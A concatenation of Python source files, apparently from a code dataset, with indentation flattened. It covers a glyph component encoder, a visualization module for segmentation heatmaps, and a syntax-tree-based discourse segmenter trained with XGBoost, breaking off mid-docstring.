ComponentConditionBlock((128, 32, 32), n_comps),
ResBlk(C*4, C*4, 3, 1),
CBAM(C*4),
ResBlk(C*4, C*4, 3, 1),
ResBlk(C*4, C*8, 3, 1, downsample=True), # 16x16
CBAM(C*8),
ResBlk(C*8, C*8)
])
self.skip_layer_idx = 8
self.feat_shape = {"last": (C*8, 16, 16), "skip": (C*4, 32, 32)}
def forward(self, x, *comp_id):
x = x.repeat((1, 1, 1, 1))
ret_feats = {}
for lidx, layer in enumerate(self.layers):
if isinstance(layer, ComponentConditionBlock):
x = layer(x, *comp_id)
else:
x = layer(x)
if lidx == self.skip_layer_idx:
ret_feats["skip"] = x
ret_feats["last"] = x
ret_feats = {k: nn.Sigmoid()(v) for k, v in ret_feats.items()}
return ret_feats
def get_feat_shape(self):
return self.feat_shape
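# Minimal shape-check sketch (the component count 371 is only a placeholder; output shapes
# follow self.feat_shape above):
#
#     # enc = ComponentEncoder(n_comps=371)
#     # imgs = torch.randn(4, 1, 128, 128)        # single-channel glyph images
#     # comp_ids = torch.randint(0, 371, (4,))    # one component id per sample
#     # feats = enc(imgs, comp_ids)
#     # feats["last"].shape -> (4, 256, 16, 16); feats["skip"].shape -> (4, 128, 32, 32)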
|
the-stack_0_1648 | import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
matplotlib.use('Agg')
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
""" Create a grid with PIL images and titles
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
:param heatmaps_dict: (dict) Dictionary of heatmaps where the key is the grayscale value of the class and the value is a dict {'class_name': (str), 'heatmap_PIL': (PIL object)}
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader (optional)
:param heatmaps: (bool) if True, include heatmaps in grid
:return: Saves .png to disk
"""
list_imgs_pil = [input_, label, output] if label is not None else [input_, output]
list_titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']
num_tiles = (len(list_imgs_pil) + len(heatmaps_dict))
height = math.ceil(num_tiles/4)
width = num_tiles if num_tiles < 4 else 4
plt.figure(figsize=(width*6, height*6))
grid_spec = gridspec.GridSpec(height, width)
if heatmaps:
for key in heatmaps_dict.keys():
list_imgs_pil.append(heatmaps_dict[key]['heatmap_PIL'])
list_titles.append(heatmaps_dict[key]['class_name'])
assert len(list_imgs_pil) == len(list_titles)
for index, zipped in enumerate(zip(list_imgs_pil, list_titles)):
img, title = zipped
plt.subplot(grid_spec[index])
plt.imshow(img)
plt.grid(False)
plt.axis('off')
plt.title(title)
plt.tight_layout()
return plt
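# Illustrative heatmaps_dict layout expected by grid_vis (keys and class names are placeholders):
#
#     # heatmaps_dict = {
#     #     0: {'class_name': 'background', 'heatmap_PIL': background_heatmap_pil},
#     #     1: {'class_name': 'forest', 'heatmap_PIL': forest_heatmap_pil},
#     # }
#     # grid_vis(input_PIL, output_PIL, heatmaps_dict, label=label_PIL).savefig('grid.png')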
def vis_from_batch(vis_params,
inputs,
outputs,
batch_index,
vis_path,
labels=None,
dataset='',
ep_num=0,
scale=None,
debug=False):
""" Provide indiviual input, output and label from batch to visualization function
:param vis_params: (Dict) parameters useful during visualization
:param inputs: (tensor) inputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param outputs: (tensor) outputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param batch_index: (int) index of batch inside epoch
:param vis_path: path where visualisation images will be saved
:param labels: (tensor) labels as pytorch tensors with dimensions (batch_size, channels, width, height)
:param dataset: name of dataset for file naming purposes (ex. 'tst')
:param ep_num: (int) number of epoch for file naming purposes
:param debug: (bool) if True, some debug features will be activated
:return:
"""
labels = [None]*(len(outputs)) if labels is None else labels  # Create an empty list of labels to enable the zip operation below when no label is given
for batch_samp_index, zipped in enumerate(zip(inputs, labels, outputs)):
epoch_samp_index = batch_samp_index + len(inputs) * batch_index
input_, label, output = zipped
vis(vis_params, input_, output,
vis_path=vis_path,
sample_num=epoch_samp_index+1,
label=label,
dataset=dataset,
ep_num=ep_num,
scale=scale,
debug=debug)
def vis(vis_params,
input_,
output,
vis_path,
sample_num=0,
label=None,
dataset='',
ep_num=0,
inference_input_path=None,
scale=None,
debug=False):
"""saves input, output and label (if given) as .png in a grid or as individual pngs
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
:param vis_path: path where visualisation images will be saved
:param sample_num: index of sample if the function is called from a loop iterating through a batch or list of images.
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
:param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
:param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
:param inference_input_path: (Path) path to input image on which inference is being performed. If given, the "inference" flag below is set to True.
:return: saves color images from input arrays as grid or as full scale .png
"""
# TODO: Temporary fix that needs to be discussed: `input_` is a list if the initial input has NIR, with the RGB at [0].
# The `squeeze` function cuts the useless dimension that appears in inference.
input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
assert vis_path.parent.is_dir()
vis_path.mkdir(exist_ok=True)
single_class_mode = False
if not vis_params[
'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
if output.shape[0] == 1:
output = torch.sigmoid(output) # use sigmoid for single class
single_class_mode = True
else:
output = F.softmax(output, dim=0) # use softmax for multiclass (note: not applied for inference)
output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
if label is not None:
label_copy = label.cpu().numpy().copy()
if vis_params['ignore_index'] < 0:
new_ignore_index = 255
# Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
if vis_params['mean'] and vis_params['std']:
input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
mode = 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
if 1 <= input_.shape[2] <= 2:
input_ = np.squeeze(input_[:, :, :1], axis=2) # take first band (will become grayscale image)
mode = 'L'
elif input_.shape[2] >= 3:
input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
# Give value of class to band with highest value in final inference
if single_class_mode:
output_acv = np.squeeze(output, axis=2).astype(np.uint8)
else:
output_acv = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
# Define colormap and names of classes with respect to grayscale values
classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
debug=debug) # Prepare heatmaps from softmax output
# Convert output and label, if provided, to RGB with matplotlib's colormap object
output_acv_color = cmap(output_acv)
output_acv_PIL = Image.fromarray((output_acv_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
if not inference_input_path and label is not None:
label_color = cmap(label_copy)
label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
else:
label_PIL = None
if inference_input_path is not None:
if debug and len(np.unique(output_acv)) == 1:
warnings.warn(f'Inference contains only {np.unique(output_acv)} value. Make sure data scale '
f'{scale} is identical with scale used for training model.')
output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
create_new_raster_from_base(inference_input_path, output_name, output_acv)
if vis_params['heatmaps_inf']:
for key in heatmaps_dict.keys():
heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
class_name = heatmaps_dict[key]['class_name']
heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
grid = grid_vis(input_PIL, output_acv_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
plt.close()
else: # SAVE PIL IMAGES DIRECTLY TO FILE
if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
if not inference_input_path and label is not None:
label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
output_acv_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
if vis_params['heatmaps']: # TODO: test this.
for key in heatmaps_dict.keys():
heatmap = heatmaps_dict[key]['heatmap_PIL']
class_name = heatmaps_dict[key]['class_name']
heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=[], inference=False, debug=False):
''' Store heatmap into a dictionary
:param output: softmax tensor
:return: dictionary where key is value of class and value is numpy array
'''
heatmaps_dict = {}
classes = range(output.shape[2]) if len(classes) == 0 else classes
for i in range(output.shape[2]): # for each channel (i.e. class) in output
perclass_output = output[:, :, i]
if inference: # Don't color heatmap if in inference
if debug:
logging.info(f'Heatmap class: {classes[i]}\n')
logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
else: # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
perclass_output_PIL = Image.fromarray(np.uint8(cm.get_cmap('inferno')(perclass_output) * 255))
heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
"""
:param colormap_path: csv file (with header) containing 3 columns (input grayscale value, classes, html colors (#RRGGBB))
:return: list of classes and list of html colors to map to grayscale values associated with classes
"""
if colormap_path is not None:
assert Path(colormap_path).is_file(), f'Could not locate {colormap_path}'
input_val = []
classes_list = ['background']
html_colors = ['#000000']
with open(colormap_path, 'rt') as file:
reader = csv.reader(file)
next(reader) # Skip header
rows = list(reader)
input_val.extend([int(row[0]) for row in rows])
csv_classes = [row[1] for row in rows] # Take second element in row. Should be class name
csv_html_colors = [row[2] for row in rows] # Take third element in row. Should be hex color code
sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))] # sort according to grayscale values order
sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
for color in sorted_colors:
match = re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color)
assert match, f'Submitted color {color} does not match HEX color code pattern'
classes_list.extend(sorted_classes)
html_colors.extend(sorted_colors)
assert len(html_colors) == len(classes_list) >= output.shape[2], f'Not enough colors and class names for number of classes in output'
html_colors.append('white')  # for ignore_index values in labels. #TODO: test this with a label containing ignore_index values
cmap = colors.ListedColormap(html_colors)
else:
classes_list = list(range(0, output.shape[2])) # TODO: since list of classes are only useful for naming each heatmap, this list could be inside the heatmaps_dict, e.g. {1: {heatmap: perclass_output_PIL, class_name: 'roads'}, ...}
cmap = cm.get_cmap(default_colormap)
return classes_list, cmap
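# Illustrative colormap CSV expected by colormap_reader (the header row is skipped; class
# names and colors below are placeholders):
#
#     # input value,class,color
#     # 1,forest,#2E7D32
#     # 2,water,#1565C0
#     # 3,roads,#F9A825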
|
the-stack_0_1650 | """
SubtreeSegmenter.py
A discourse unit segmentation module based on a moving window capturing parts of
a dependency syntax parse.
"""
import io, sys, os, copy
# Allow package level imports in module
script_dir = os.path.dirname(os.path.realpath(__file__))
lib = os.path.abspath(script_dir + os.sep + "..")
models = os.path.abspath(script_dir + os.sep + ".."+os.sep+".."+os.sep + "models")
sys.path.append(lib)
from collections import defaultdict, Counter
from argparse import ArgumentParser
#os.environ['OMP_NUM_THREADS'] = "1"
import numpy as np
import pandas as pd
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier, GradientBoostingClassifier
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from conll_reader import read_conll, get_multitrain_preds
from tune import permutation_importances, report_correlations, report_theils_u, get_best_params, get_best_score, hyper_optimize, grid_search
np.random.seed(42)
import random
random.seed(42)
DEFAULTCLF = RandomForestClassifier(random_state=42)
DEFAULTCLF = XGBClassifier(random_state=42, max_depth=50, min_child_weight=1, n_estimators=200, n_jobs=3 , verbose=1,learning_rate=0.16)
DEFAULTPARAMS = {"n_estimators":250,"min_samples_leaf":3,"max_features":10,"random_state":42}
class SubtreeSegmenter:
def __init__(self,lang="eng",model=None,multifolds=5,auto=""):
self.name = "SubtreeSegmenter"
self.genre_pat = "^(..)" # By default 2 first chars of docname identify genre
if "gum" in model:
self.genre_pat = "GUM_([^_]+)_"
self.lang = lang
self.multifolds = multifolds
self.corpus = model
self.auto = auto
if model is not None:
self.model = models + os.sep + model + auto + "_subtreeseg.pkl"
else:
self.model = ".." + os.sep + ".." + os.sep + "models" + os.sep + auto + "subtreeseg.pkl"
self.corpus_dir = None
self.clf = DEFAULTCLF
def read_data(self,infile,size,as_text,rare_thresh,chosen_feats=None):
cap = 3*size if size is not None else None
train_feats, vocab, toks, firsts, lasts = read_conll(infile,genre_pat=self.genre_pat,mode="seg",cap=cap,char_bytes=self.lang=="zho",as_text=as_text)
vocab = Counter(vocab)
top_n_words = vocab.most_common(rare_thresh)
top_n_words, _ = zip(*top_n_words)
for tok in train_feats:
if tok["word"] not in top_n_words:
tok["word"] = tok["pos"]
tokens_by_abs_id = self.traverse_trees(train_feats)
data, headers = self.n_gram(train_feats,tokens_by_abs_id)
# Features to use for all n-gram tokens
num_labels = ["head_dist","left_span","right_span","samepar_left","tok_len"]
cat_labels = ["case","closest_left","closest_right","deprel","farthest_left","farthest_right","pos","word","morph","cpos","depchunk"]
pref_cat = []
pref_num = []
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
pref_cat += [pref + "_" + h for h in cat_labels]
pref_num += [pref + "_" + h for h in num_labels]
# Features only needed for node token
cat_labels += ["genre"] + pref_cat #+ ["heading_first","heading_last"]#+ ["s_type"]
num_labels += ["dist2end","sent_doc_percentile","tok_id","wid","quote","rank"] + pref_num # + ["bracket"]
num_labels += ["par_quote","par_par_quote"]#,"par_bracket","par_par_bracket"]
# Use specific feature subset
if chosen_feats is not None:
new_cat = []
new_num = []
for feat in chosen_feats:
if feat in cat_labels:
new_cat.append(feat)
elif feat in num_labels:
new_num.append(feat)
cat_labels = new_cat
num_labels = new_num
data = pd.DataFrame(data, columns=headers)
data_encoded, multicol_dict = self.multicol_fit_transform(data, pd.Index(cat_labels))
data_x = data_encoded[cat_labels+num_labels].values
data_y = np.where(data_encoded['label'] == "_", 0, 1)
return data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words
def train(self,training_file,rare_thresh=200,clf_params=None,chosen_feats=None,tune_mode=None,size=None,as_text=True,multitrain=False,chosen_clf=DEFAULTCLF):
"""
:param training_file:
:param rare_thresh:
:param clf_params:
:param chosen_feats: List of feature names to force a subset of selected features to be used
:param tune_mode: None for no grid search, "paramwise" to tune each hyperparameter separately, or "full" for complete grid (best but slowest)
:param size: Sample size to optimize variable importance with
:return:
"""
if tune_mode is not None and size is None:
size = 5000
sys.stderr.write("o No sample size set - setting size to 5000\n")
if clf_params is None:
# Default classifier parameters
clf_params = {"n_estimators":150,"min_samples_leaf":3, "random_state":42}
if DEFAULTCLF.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf_params.update({"n_jobs":4, "oob_score":True, "bootstrap":True})
data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words = self.read_data(training_file,size,as_text=as_text,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
sys.stderr.write("o Learning...\n")
if tune_mode is not None:
# Randomly select |size| samples for training and leave rest for validation, max |size| samples
data_x = data_encoded[cat_labels+num_labels+["label"]].sample(frac=1,random_state=42)
data_y = np.where(data_x['label'] == "_", 0, 1)
data_x = data_x[cat_labels+num_labels]
if len(data_y) > 2*size:
val_x = data_x[size:2*size]
val_y = data_y[size:2*size]
else:
val_x = data_x[size:]
val_y = data_y[size:]
data_x = data_x[:size]
data_y = data_y[:size]
if tune_mode == "importances":
sys.stderr.write("o Measuring correlation of categorical variables\n")
theil_implications = report_theils_u(val_x,cat_labels)
for (var1, var2) in theil_implications:
if var1 in cat_labels and var2 in cat_labels and var2 !="word":
drop_var = var2
u = theil_implications[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to Theil's U " + str(u)[:6] + " of " + var1 + "->" + var2 + "\n")
cat_labels.remove(drop_var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels],thresh=0.95)
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 # if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
if tune_mode in ["paramwise","full"]: # Grid Search
best_clf, best_params = grid_search(data_x,data_y,tune_mode,clf_params)
clf_name = best_clf.__class__.__name__
self.clf = best_clf
return best_clf, best_params
elif tune_mode == "hyperopt": # TPE guided random search
from hyperopt import hp
from hyperopt.pyll.base import scope
val_x, val_y = None, None
if self.corpus_dir is not None:
dev_file = self.corpus_dir + os.sep + self.corpus + "_dev.conll"
_, val_x, val_y, _, _, _, _, _, _ = self.read_data(dev_file,size,as_text=False,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
space = {
'n_estimators': scope.int(hp.quniform('n_estimators', 100, 250, 10)),
'max_depth': scope.int(hp.quniform('max_depth', 3, 30, 1)),
'eta': scope.float(hp.quniform('eta', 0.01, 0.2, 0.01)),
'gamma': scope.float(hp.quniform('gamma', 0.01, 0.2, 0.01)),
'colsample_bytree': hp.choice('colsample_bytree', [0.4,0.5,0.6,0.7,1.0]),
'subsample': hp.choice('subsample', [0.5,0.6,0.7,0.8,1.0]),
'clf': hp.choice('clf', ["xgb"])
}
best_clf, best_params = hyper_optimize(data_x.values,data_y,val_x=None,val_y=None,space=space,max_evals=20)
return best_clf, best_params
else: # No hyperparameter optimization
clf = chosen_clf if chosen_clf is not None else DEFAULTCLF
sys.stderr.write("o Setting params " + str(clf_params) + "\n")
clf.set_params(**clf_params)
if clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf.set_params(**{"n_jobs":3,"oob_score":True,"bootstrap":True})
if clf.__class__.__name__ in ["XGBClassifier"]:
clf.set_params(**{"n_jobs":3})
clf.set_params(**{"random_state":42})
if multitrain:
multitrain_preds = get_multitrain_preds(clf,data_x,data_y,self.multifolds)
multitrain_preds = "\n".join(multitrain_preds.strip().split("\n")[1:-1]) # Remove OOV tokens at start and end
with io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus,'w',newline="\n") as f:
sys.stderr.write("o Serializing multitraining predictions\n")
f.write(multitrain_preds)
if clf.__class__.__name__ == "CatBoostClassifier":
clf.fit(data_x,data_y,cat_features=list(range(len(cat_labels))))
else:
clf.fit(data_x,data_y)
self.clf = clf
feature_names = cat_labels + num_labels
sys.stderr.write("o Using " + str(len(feature_names)) + " features\n")
zipped = zip(feature_names, clf.feature_importances_)
sorted_zip = sorted(zipped, key=lambda x: x[1], reverse=True)
sys.stderr.write("o Feature Gini importances:\n\n")
for name, importance in sorted_zip:
sys.stderr.write(name + "=" + str(importance) + "\n")
if self.clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
sys.stderr.write("\no OOB score: " + str(clf.oob_score_)+"\n\n")
if tune_mode=="permutation":
# Filter features based on permutation importance score threshold
imp = permutation_importances(clf,val_x,val_y)
for var, score in imp.items():
if score < 0 and var != "word":
sys.stderr.write("o Dropping feature " + var + " due to low permutation importance of " + str(score) + "\n")
if var in cat_labels:
cat_labels.remove(var)
elif var in num_labels:
num_labels.remove(var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels])
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
sys.stderr.write("\no Serializing model...\n")
joblib.dump((clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts), self.model, compress=3)
def predict_cached(self,train=None):
pairs = io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus).read().split("\n")
preds = [(int(pr.split()[0]), float(pr.split()[1])) for pr in pairs if "\t" in pr]
return preds
def predict(self, infile, eval_gold=False, as_text=True):
"""
Predict sentence splits using an existing model
:param infile: File in DISRPT shared task *.tok or *.conll format (sentence breaks will be ignored in .conll)
:param eval_gold: Whether to score the prediction; only applicable if using a gold .conll file as input
:param genre_pat: A regex pattern identifying the document genre from document name comments
:param as_text: Boolean, whether the input is a string, rather than a file name to read
:return: tokenwise binary prediction vector if eval_gold is False, otherwise prints evaluation metrics and diff to gold
"""
if self.model is None: # Try default model location
model_path = ".." + os.sep + ".." + os.sep + "models" + os.sep + "subtreeseg.pkl"
else:
model_path = self.model
clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts = joblib.load(model_path)
feats, _, toks, _, _ = read_conll(infile,genre_pat=self.genre_pat,mode="seg",as_text=as_text,char_bytes=self.lang=="zho")
tokens_by_abs_id = self.traverse_trees(feats)
feats, headers = self.n_gram(feats,tokens_by_abs_id,dummies=False)
temp = []
headers_with_oov = ["first","last","deprel","closest_left","closest_right","farthest_left","farthest_right",
"pos","cpos","morph","s_type","depchunk"]
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
temp += [pref + "_" + h for h in headers_with_oov]
headers_with_oov += temp
genre_warning = False
for i, header in enumerate(headers):
if header in headers_with_oov and header in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"][header].classes_:
item[i] = "_"
elif header == "genre" and "genre" in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"]["genre"].classes_: # New genre not in training data
if not genre_warning:
sys.stderr.write("! WARN: Genre not in training data: " + item[i] + "; suppressing further warnings\n")
genre_warning = True
item[i] = "_"
elif header.endswith("word") and header in cat_labels:
for item in feats:
# Replace rare words and words never seen before in this position with POS
if item[i] not in top_n_words or item[i] not in multicol_dict["encoder_dict"][header].classes_:
pos_col = headers.index(header.replace("word","pos"))
if item[pos_col] in multicol_dict["encoder_dict"][header].classes_:
item[i] = item[pos_col]
else:
item[i] = "_"
data = feats
data = pd.DataFrame(data, columns=headers)
data_encoded = self.multicol_transform(data,columns=multicol_dict["columns"],all_encoders_=multicol_dict["all_encoders_"])
data_x = data_encoded[cat_labels+num_labels].values
probas = clf.predict_proba(data_x)
probas = [p[1] for p in probas]
preds = [int(p>0.5) for p in probas]
for i, p in enumerate(preds):
if data["tok_id"].values[i] == 1: # Ensure tok_id 1 is always a segment start
preds[i] = 1
if eval_gold:
gold = np.where(data_encoded['label'] == "_", 0, 1)
conf_mat = confusion_matrix(gold, preds)
sys.stderr.write(str(conf_mat) + "\n")
true_positive = conf_mat[1][1]
false_positive = conf_mat[0][1]
false_negative = conf_mat[1][0]
prec = true_positive / (true_positive + false_positive)
rec = true_positive / (true_positive + false_negative)
f1 = 2*prec*rec/(prec+rec)
sys.stderr.write("P: " + str(prec) + "\n")
sys.stderr.write("R: " + str(rec) + "\n")
sys.stderr.write("F1: " + str(f1) + "\n")
with io.open("diff.tab",'w',encoding="utf8") as f:
for i in range(len(gold)):
f.write("\t".join([toks[i],str(gold[i]),str(preds[i])])+"\n")
return conf_mat, prec, rec, f1
else:
return zip(preds,probas)
def optimize(self, train, rare_thresh=200, size=5000, tune_mode="paramwise",as_text=False, cached_params=False):
# Estimate useful features on a random sample of |size| instances
selected_cat, selected_num = self.train(train,rare_thresh=rare_thresh,tune_mode="importances",size=size,as_text=as_text)
selected_feats = selected_cat + selected_num
with io.open(script_dir + os.sep + "SubtreeSegmenter_best_params"+self.auto+".tab",'a',encoding="utf8") as bp:
bp.write(self.corpus + "\t"+self.clf.__class__.__name__+"\tfeatures\t" + ",".join(selected_feats)+"\n")
sys.stderr.write("o Chose "+str(len(selected_feats))+" features: " + ",".join(selected_feats)+"\n")
if tune_mode != "features":
sys.stderr.write("o Tuning hyperparameters\n\n")
# Optimize hyperparameters via grid search
if cached_params:
best_clf, best_params, _ = get_best_params(self.corpus, self.name)
sys.stderr.write("\no Using cached best hyperparameters\n")
elif tune_mode!="features":
best_clf, best_params = self.train(train,rare_thresh=rare_thresh,tune_mode=tune_mode,size=200000,as_text=as_text, chosen_feats=selected_feats)
sys.stderr.write("\no Found best hyperparameters\n")
else:
best_clf = DEFAULTCLF
best_params = DEFAULTPARAMS
sys.stderr.write("\no Using default hyperparameters\n")
for key, val in best_params.items():
sys.stderr.write(key + "\t" + str(val) + "\n")
sys.stderr.write(best_clf.__class__.__name__ + "\n")
sys.stderr.write("\n")
return best_clf, selected_feats, best_params
@staticmethod
def traverse_trees(tokens):
tokens_by_abs_id = {}
def get_descendants(parent_id, children_dict, seen_tokens):
# Helper function to recursively collect children of children
my_descendants = []
my_descendants += children_dict[parent_id]
for child in children_dict[parent_id]:
if child["abs_id"] in seen_tokens:
sys.stderr.write("\nCycle detected in syntax tree in sentence " + str(child["s_id"])+" token: "+child["word"]+"\n")
sys.exit("Exiting due to invalid input\n")
else:
seen_tokens.add(child["abs_id"])
for child in children_dict[parent_id]:
child_id = child["abs_id"]
if child_id in children_dict:
my_descendants += get_descendants(child_id, children_dict, seen_tokens)
return my_descendants
def get_rank(tok, token_dict, rank=0):
# Helper function to determine tokens' graph depth
if tok["abs_parent"].endswith("_0"):
return rank
else:
rank+=1
return get_rank(token_dict[tok["abs_parent"]],token_dict,rank=rank)
# Make unique ids
for tok in tokens:
tok["abs_id"] = str(tok["s_id"]) + "_" + str(tok["wid"])
tok["abs_parent"] = str(tok["s_id"]) + "_" + str(tok["head"])
tok["descendants"] = [] # Initialize descendant list
tokens_by_abs_id[str(tok["s_id"]) + "_" + str(tok["wid"])] = tok
# Add dist2end feature (=reverse id)
for tok in tokens:
tok["dist2end"] = tok["s_len"]-tok["wid"]
# Make children dict
children = defaultdict(list)
for tok in tokens:
if not tok["abs_parent"].endswith("_0"):
children[tok["abs_parent"]].append(tok)
# Recursively get descendants
for parent_id in children:
seen_tokens = set()
parent = tokens_by_abs_id[parent_id]
parent["descendants"] = get_descendants(parent_id, children, seen_tokens)
# Compute graph rank for each token
for tok in tokens:
tok["rank"] = get_rank(tok, tokens_by_abs_id, 0)
# Use descendant dictionary to find closest/farthest left/right children's network
for tok in tokens:
tok["farthest_left"] = tok
tok["farthest_right"] = tok
tok["closest_right"] = tok
tok["closest_left"] = tok
tok["right_span"] = 0
tok["left_span"] = 0
d_list = sorted(tok["descendants"],key=lambda x: x["tok_id"])
for d in d_list:
d_id = d["tok_id"]
t_id = tok["tok_id"]
if d_id < t_id: # Left child
if d_id < int(tok["farthest_left"]["tok_id"]):
tok["farthest_left"] = d
# tok["left_span"] = self.bin_numbers(tok["left_span"] ,bin_splits=[-6,-3,-1,0,1,2,4,7])
tok["left_span"] = int(tok["tok_id"]) - int(d["tok_id"])
if (d_id > int(tok["closest_left"]["tok_id"]) and d_id < tok["tok_id"]) or (d_id < tok["tok_id"] and tok["closest_left"] == tok):
tok["closest_left"] = d
else: # Right child
if d_id > int(tok["farthest_right"]["tok_id"]):
tok["farthest_right"] = d
tok["right_span"] = int(d["tok_id"]) - int(tok["tok_id"])
if (d_id < tok["closest_right"]["tok_id"] and d_id > tok["tok_id"]) or (d_id > tok["tok_id"] and tok["closest_right"] == tok):
tok["closest_right"] = d
# Represent child network as deprels
for prop in ["closest_right","closest_left","farthest_right","farthest_left"]:
if tok[prop] == tok:
tok[prop] = "_"
else:
tok[prop] = tok[prop]["deprel"]
# Add same parent features (whether a token has the same parent as its right/left neighbors)
tokens[0]["samepar_left"] = 0
tokens[-1]["samepar_right"] = 0
for i in range(1,len(tokens)-1):
prev, tok, next = tokens[i-1], tokens[i], tokens[i+1]
if prev["abs_parent"] == tok["abs_parent"]:
prev["samepar_right"] = 1
tok["samepar_left"] = 1
else:
prev["samepar_right"] = 0
tok["samepar_left"] = 0
if next["abs_parent"] == tok["abs_parent"]:
tok["samepar_right"] = 1
next["samepar_left"] = 1
else:
tok["samepar_right"] = 0
next["samepar_left"] = 0
return tokens_by_abs_id
@staticmethod
def bin_numbers(number,bin_splits=None):
if bin_splits is None:
return 1 # Single bin
else:
for i in bin_splits:
if number >= i:
return i
return bin_splits[0] # If number not greater than any split, it belongs in minimum bin
@staticmethod
def n_gram(data, tokens_by_abs_id, dummies=True):
"""
Turns unigram list of feature dicts into list of five-skipgram+parent features by adding features of adjacent tokens
:param data: input tokens as a list of dictionaries, each filled with token property key-values
